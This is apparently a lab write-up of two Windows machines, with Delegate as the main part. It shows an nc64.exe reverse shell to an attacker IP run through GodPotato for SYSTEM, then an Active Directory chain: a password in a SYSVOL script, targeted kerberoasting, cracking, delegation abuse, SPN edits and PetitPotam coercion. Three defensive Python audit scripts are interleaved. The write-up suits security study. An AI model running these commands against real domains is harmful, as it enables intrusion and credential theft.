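The two privilege tables tell the whole story of this escalation: the shell the web server spawned runs as LOCAL SERVICE with a stripped token, and FullPowers hands back the default LOCAL SERVICE privileges (seven of them, matching its "Privilege count: 7"), including SeImpersonatePrivilege, which is what GodPotato needs next. Parsing that table is a useful triage step for a defender reviewing a suspicious shell or a service's token. The script below is an added example for this writeup, not code or output from FullPowers or GodPotato; BEFORE and AFTER are the two tables copied from the writeup's own shells, and the HIGH_RISK list is this example's own choice of what to flag.

```python
"""Parse the PRIVILEGES INFORMATION table from `whoami /all` and flag token
privileges that let a service account escalate.

Added example for this writeup, not code or output from FullPowers or
GodPotato. BEFORE and AFTER are the privilege tables the writeup's shells
printed (LOCAL SERVICE as spawned by the web server, then after FullPowers).
"""
import re

BEFORE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeCreateGlobalPrivilege       Create global objects               Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled
"""

AFTER = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""

# Privileges whose mere presence in a token is worth an alert: a disabled
# privilege can be re-enabled by the holder with AdjustTokenPrivileges.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate clients (what the potato tools need)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeDebugPrivilege": "open any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
}

# one table row: name, free-text description, then Enabled/Disabled
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text: str) -> dict:
    """Return {privilege name: 'Enabled' | 'Disabled'} from whoami output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_privileges(text: str) -> dict:
    """High-risk privileges present in the token, with their current state."""
    return {p: s for p, s in parse_privileges(text).items() if p in HIGH_RISK}


def gained(before: str, after: str) -> list:
    """Privileges present in `after` but not in `before`."""
    return sorted(set(parse_privileges(after)) - set(parse_privileges(before)))


if __name__ == "__main__":
    for label, table in (("before FullPowers", BEFORE), ("after FullPowers", AFTER)):
        print(label, "->", risky_privileges(table) or "nothing risky")
    print("restored:", gained(BEFORE, AFTER))
```

Feed it the output of `whoami /all` from any shell you are triaging; an empty result from risky_privileges() is the state you want for a web server's worker account. The hardening lesson the table makes visible: the stripped token was not enough, because a service account that can create scheduled tasks can get its default privilege set back, so the service should run under a virtual or managed service account without SeImpersonatePrivilege rather than under LOCAL SERVICE or NETWORK SERVICE.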


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052


and, again with another listener running:

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

vulnlab-delegate

vulnlab-delegate

a hard machine

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
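SYSVOL is readable by every authenticated domain user, so a password in a logon script is effectively public to the whole domain. The scanner below is an added example for this writeup, not code from any tool used in it: it runs a few credential patterns over script text and reports the user and a masked secret. SAMPLE_USERS_BAT is the users.bat pulled from SYSVOL above; SAMPLE_EXTRA is constructed here to show two more patterns the scanner understands.

```python
"""Scan logon scripts (e.g. from SYSVOL\\<domain>\\scripts) for embedded
credentials.

Added example for this writeup, not code from any tool used in it.
SAMPLE_USERS_BAT is the users.bat the writeup pulled from SYSVOL; SAMPLE_EXTRA
is constructed here to exercise the other two patterns.
"""
import re

SAMPLE_USERS_BAT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
"""

# constructed sample, not from the writeup
SAMPLE_EXTRA = r"""@echo off
cmdkey /add:fileserver /user:svc_backup /pass:Wint3r2023!
mysql -h db01 -u root --password=Summer2024 < nightly.sql
"""

PATTERNS = [
    # net use <drive> \\server\share /user:<user> <password>
    ("net use", re.compile(
        r"net\s+use\s+\S+\s+\\\\\S+\s+/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)),
    # cmdkey /add:<target> /user:<user> /pass:<password>
    ("cmdkey", re.compile(
        r"cmdkey\s+.*?/user:(?P<user>\S+)\s+/pass:(?P<secret>\S+)", re.I)),
    # --password=, password:, pwd= and similar
    ("generic", re.compile(
        r"(?:--password|password|passwd|pwd)\s*[=:]\s*(?P<secret>\S+)", re.I)),
]


def mask(secret: str) -> str:
    """Keep only the first character so a report never repeats the secret."""
    return secret[0] + "*" * (len(secret) - 1)


def scan_script(text: str, name: str = "<script>") -> list:
    """Return one finding per line that carries a credential."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            # "/user:x *" makes net use prompt for the password: not a leak
            if not m or m.group("secret") == "*":
                continue
            findings.append({
                "script": name,
                "line": n,
                "kind": kind,
                "user": m.groupdict().get("user"),
                "secret_masked": mask(m.group("secret")),
                "secret_len": len(m.group("secret")),
            })
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_USERS_BAT, "users.bat") + scan_script(SAMPLE_EXTRA, "extra.bat"):
        print(f"{f['script']}:{f['line']} {f['kind']} user={f['user']} "
              f"secret={f['secret_masked']} ({f['secret_len']} chars)")
```

Point scan_script() at every file under \\<dc>\SYSVOL\<domain>\scripts and Policies\*\Machine\Scripts on a schedule; the match on line 5 of users.bat is exactly the finding that would have caught this box's foothold. The regexes are deliberately narrow; widen them for your own environment's tooling rather than relying on the generic pattern alone.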

BloodHound to get more info:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

Uploading the data to BloodHound, we find:

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$--snip--
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

New tools from krbrelayx (dnstool.py, printerbug.py):

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

New tools (bloodyAD.py, addspn.py and PetitPotam.py):

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
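What bloodyAD did here is set one bit, 0x80000 (TRUSTED_FOR_DELEGATION), in the userAccountControl attribute of the machine account created under the MachineAccountQuota; the earlier GetNPUsers run was looking for another bit in the same attribute, 0x400000 (DONT_REQ_PREAUTH, impacket's UF_DONT_REQUIRE_PREAUTH). Both conditions are cheap to audit from an LDAP export once the bitmask is decoded. The decoder and audit below are an added example for this writeup, not code from impacket or bloodyAD; SAMPLE_ACCOUNTS is constructed to mirror the writeup (DC1$, UwU$ after the uac change, a normal user) plus an invented svc_legacy account with pre-authentication disabled, which this domain did not actually have.

```python
"""Decode AD userAccountControl bitmasks and audit for unconstrained
delegation on non-DC accounts and for disabled Kerberos pre-authentication.

Added example for this writeup, not code from impacket or bloodyAD.
SAMPLE_ACCOUNTS is constructed: DC1$ and UwU$ mirror the writeup, svc_legacy
is invented to show the AS-REP roastable case.
"""

# userAccountControl flag bits (ADS_USER_FLAG_ENUM / MS-ADTS)
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}

SAMPLE_ACCOUNTS = {
    "DC1$": 0x2000 | 0x80000,                  # every DC: SERVER_TRUST + TRUSTED_FOR_DELEGATION
    "UwU$": 0x1000 | 0x80000,                  # workstation account after `add uac -f TRUSTED_FOR_DELEGATION`
    "A.Briggs": 0x200,                         # plain NORMAL_ACCOUNT
    "svc_legacy": 0x200 | 0x10000 | 0x400000,  # constructed: DONT_REQ_PREAUTH set
}


def decode_uac(value: int) -> list:
    """Flag names set in value, in ascending bit order."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def encode_uac(*names: str) -> int:
    """Inverse of decode_uac: build a bitmask from flag names."""
    value = 0
    for name in names:
        value |= NAME_TO_BIT[name]
    return value


def set_flag(value: int, name: str) -> int:
    """The attribute write bloodyAD's `add uac -f <flag>` performs: OR one bit in."""
    return value | NAME_TO_BIT[name]


def audit_accounts(accounts: dict) -> dict:
    """Return {sAMAccountName: [issue, ...]} for accounts worth a closer look."""
    findings = {}
    for sam, value in accounts.items():
        flags = set(decode_uac(value))
        issues = []
        if "DONT_REQ_PREAUTH" in flags:
            issues.append("Kerberos pre-authentication disabled (AS-REP roastable)")
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            issues.append("unconstrained delegation on a non-DC account")
        if "PASSWD_NOTREQD" in flags:
            issues.append("password not required")
        if issues:
            findings[sam] = issues
    return findings


if __name__ == "__main__":
    for sam, value in SAMPLE_ACCOUNTS.items():
        print(f"{sam:12} {value:#010x} {decode_uac(value)}")
    print(audit_accounts(SAMPLE_ACCOUNTS))
```

Feed audit_accounts() the sAMAccountName/userAccountControl pairs from an LDAP export of all users and computers; on a healthy domain only domain controllers should carry TRUSTED_FOR_DELEGATION, and a freshly created machine account gaining it is the event to alert on (Event ID 4742 with a changed UAC value). Lowering ms-DS-MachineAccountQuota to 0 removes the first step of this chain, and putting privileged accounts in Protected Users stops their TGTs being delegated at all.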
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below, bloodyAD installed in a Python virtual environment (I had troubles with dependencies)

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
